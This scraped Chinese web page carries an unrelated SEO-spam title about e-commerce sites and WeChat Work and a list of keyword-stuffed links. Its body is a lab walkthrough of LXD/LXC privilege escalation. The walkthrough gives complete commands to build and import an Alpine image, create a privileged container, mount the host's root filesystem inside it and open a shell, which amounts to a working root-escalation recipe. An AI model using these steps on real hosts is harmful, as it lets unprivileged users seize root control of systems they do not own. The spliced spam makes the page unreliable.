当前位置: 首页 > news >正文

电子商务网站的建设方式企业微信怎么申请

电子商务网站的建设方式,企业微信怎么申请,游戏类网页设计,网络推广培训哪个好lxd/lxc提权 漏洞介绍 lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配 原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘&#xf…

lxd/lxc提权

漏洞介绍

lxd是一个root进程,它可以负责执行任意用户的lxd,unix套接字写入访问操作。而且在一些情况下,lxd不会调用它的用户权限进行检查和匹配

原理可以理解为用用户创建一个容器,再用容器挂载宿主机磁盘,最后使用容器权限操作宿主机磁盘内容达到提权效果

提权复现

环境:攻击机kali 192.168.31.131 靶机 192.168.31.134

image-20231125152324099

image-20231125152414099

在攻击机kali上操作

通过git将构建好的alpine镜像克隆到本地,并构建

git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686

然后将自己操作系统对应架构tar文件发送到靶机上

python -m http.server 8848

然后在下载的目录上使用此命令导入镜像

lxc image import ./alpine*.tar.gz --alias myimage 

初始化镜像,一路回车选择默认,不过会有几个显示以及存在default,让你重命名的,选择了就可以

lxd init

可能最后报错,但是也没关系

例如

image-20231125171111579

运行镜像

lxc init myimage mycontainer -c security.privileged=true

将/root挂载到镜像中

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

与镜像交互

lxc start mycontainer
lxc exec mycontainer /bin/sh
lxc start mycontainer
lxc exec mycontainer /bin/sh

image-20231125171236266

http://www.yayakq.cn/news/546872/

相关文章:

  • 如何建设门户网站企业网站管理系统推荐
  • 辽宁专业网站建设环保设备公司网站模板
  • 塑模毕业设计代做网站公司网站建设的改进的建议
  • 石排镇网站建设访客浏览网站 网站怎么跟踪
  • 网站设计交流蛋糕网站网页设计
  • 企业信息化建设网站网站上的销售怎么做
  • 怎么做会员积分网站示范校建设 成果网站
  • 网站皮肤样板哪个网站做视频收益高
  • php网站开发和部署wordpress 删除demo
  • 如何学做网站外包资源丰富免费的网站推荐排名
  • 成品网站1688特色外贸营销型网站建设公司
  • 搜网站关键词佛山骏域网站建设
  • 企业网站建设费是无形资产吗医疗网站备案
  • 建设商城类网站多少钱做区块链的网站
  • wordpress模板 极简北京网站优化解决方案
  • 常州企业网站建站模板网站创建服务公司
  • 自己建还是找代理建网站网站建设顺序
  • 建设项目招标网站英语网站online
  • 广州网站推广技巧门户网站建设招标方
  • 环保网站建设价格亚马逊雨林在地图上的位置
  • 外贸网站建设商家建网站要去备案
  • 西安 做网站网站模板案例
  • 中小企业外贸网站建设现状免备案wordpress主机
  • 成功案例网站建设一个完整的项目策划书
  • mysql数据库网站小程序定制
  • 网站代码查询Wordpress连接ftp用户名
  • 黄石本土做网站的公司丰城网站建设
  • 比较好的网站公司简述网站建设的基本过程
  • 解决wordpress占用内存嘉兴优化网站公司哪家好
  • 呼和浩特市手机网站福步外贸网